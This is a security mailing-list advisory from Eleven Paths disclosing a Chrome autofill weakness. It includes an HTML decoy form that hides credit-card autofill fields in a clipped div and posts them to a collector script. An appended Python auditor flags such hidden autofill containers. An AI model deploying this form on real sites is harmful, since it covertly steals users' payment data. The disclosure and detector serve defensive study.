List: full-disclosure
Subject: [Full-disclosure] How to take advantage of Chrome autofill feature to get sensitive information
From: "vulns () 11paths ! com" <vulns () 11paths ! com>
Date: 2013-10-31 14:15:50
Message-ID: 4225a2001dda41438403f428fdfdf3fa () DBXPR05MB016 ! eurprd05 ! prod ! outlook ! com
At the end of 2010, Google introduced autofill in Chrome, a feature that may be a security problem for its users. Chrome's autofill allows storing postal addresses (divided into other data like name, surname, telephone, postal code...) and credit cards (divided into cardholder name, number and expiration date). For a form to take advantage of the autofill feature, input fields have to be properly identified so Chrome knows what values go with them. There is a weakness that may allow an attacker to take advantage of this characteristic to obtain private information like an address or credit card data without the user noticing anything.

As a precaution, Chrome only fills in the credit card number with autofill under https pages. This is not a problem for the attacker, since he just has to operate under an SSL connection. Another precaution that Chrome takes is to forbid the "hidden" tag in autocomplete inputs. Chrome also avoids filling in autofill inputs if there is a div tag with visibility set to "hidden".

So a formula would be to take advantage of the scroll property, raising the layer some pixels so the inputs used to steal information are unseen. In this case, the "decoy" form would be created by using this specially crafted "div", so we get to hide all these inputs inside it and the browser will not show them (but will autofill them):

<form action="recolector.php" method="post">
<div style="overflow:hidden;height:35px;">
Nombre <input id="cn" autocomplete="cc-name" ><br><br>
<input id="cc" autocomplete="cc-number" >
<input id="ce" autocomplete="cc-exp" >
<input id="c5" autocomplete="cc-exp" maxlength="5">
<input id="cg" autocomplete="cc-given-name">
<input id="ca" autocomplete="cc-additional-name">
<input id="cf" autocomplete="cc-family-name">
...
</div>

Chrome will fill in all that information without the user noticing anything. This weakness has been detected by Ricardo Martín from Eleven Paths (ricardo.martin@11paths.com). Full samples and a detailed explanation are here:
http://blog.elevenpaths.com/2013/10/how-to-take-advantage-of-chrome.html
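As an added example that is not part of the original post, here is a small Python check that a site reviewer or crawler could run over page markup to flag the pattern described above: autofill-capable inputs stacked inside an overflow:hidden container whose fixed height leaves no room to display them. The AUTOFILL token list, the 20px-per-row estimate and the sample form are my own assumptions and constructions, modelled on the decoy form in the post, not code from Eleven Paths.

```python
from html.parser import HTMLParser
import re

AUTOFILL = {"cc-name", "cc-given-name", "cc-additional-name", "cc-family-name", "cc-number",
            "cc-exp", "cc-exp-month", "cc-exp-year", "cc-csc", "name", "street-address",
            "postal-code"}  # autocomplete tokens Chrome fills from stored card/address data
VOID = {"br", "hr", "img", "input", "meta", "link"}  # tags that never get an end tag
ROW_PX = 20  # assumed: rough height one visible text input needs

def styles(attr):  # inline style attribute -> lower-cased {property: value} dict
    pairs = (d.split(":", 1) for d in attr.split(";") if ":" in d)
    return {k.strip().lower(): v.strip().lower() for k, v in pairs}

class ClipAuditor(HTMLParser):
    """Flags autofill inputs inside an overflow:hidden box too short to show them."""
    def __init__(self):
        super().__init__()
        self.stack = []     # open elements: [tag, style dict, autofill ids inside]
        self.findings = []  # (tag, visible_rows, autofill ids) per clipping box
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("autocomplete", "").lower() in AUTOFILL:
            for entry in self.stack:  # every open ancestor contains this field
                entry[2].append(a.get("id") or a.get("name") or a["autocomplete"])
        if tag not in VOID:
            self.stack.append([tag, styles(a.get("style", "")), []])
    def handle_endtag(self, tag):  # unwind to the matching open tag, if any
        if any(e[0] == tag for e in self.stack):
            while self.check(self.stack.pop()) != tag: pass
    def check(self, entry):
        tag, style, fields = entry
        height = re.fullmatch(r"(\d+(?:\.\d+)?)px", style.get("height", ""))
        clips = "hidden" in (style.get("overflow", ""), style.get("overflow-y", ""))
        if fields and height and clips:
            rows = int(float(height.group(1)) // ROW_PX)
            if len(fields) > rows:  # more autofill fields than rows that fit
                self.findings.append((tag, rows, fields))
        return tag

def audit(html):  # one (tag, visible_rows, fields) finding per clipping container
    p = ClipAuditor()
    p.feed(html)
    p.close()
    while p.stack:  # containers never closed (the sample omits </form>) count too
        p.check(p.stack.pop())
    return p.findings

# Constructed sample modelled on the decoy form quoted in the post above.
DECOY_FORM = """<form action="recolector.php" method="post"><div style="overflow:hidden;height:35px;">
Nombre <input id="cn" autocomplete="cc-name"><br><br><input id="cc" autocomplete="cc-number">
<input id="ce" autocomplete="cc-exp"> <input id="cg" autocomplete="cc-given-name"></div>"""
```

A 35px box has room for one row by this estimate, so the four card fields inside it produce a single finding naming all of them; a container tall enough for its fields, or one holding no autofill tokens, produces none.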
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/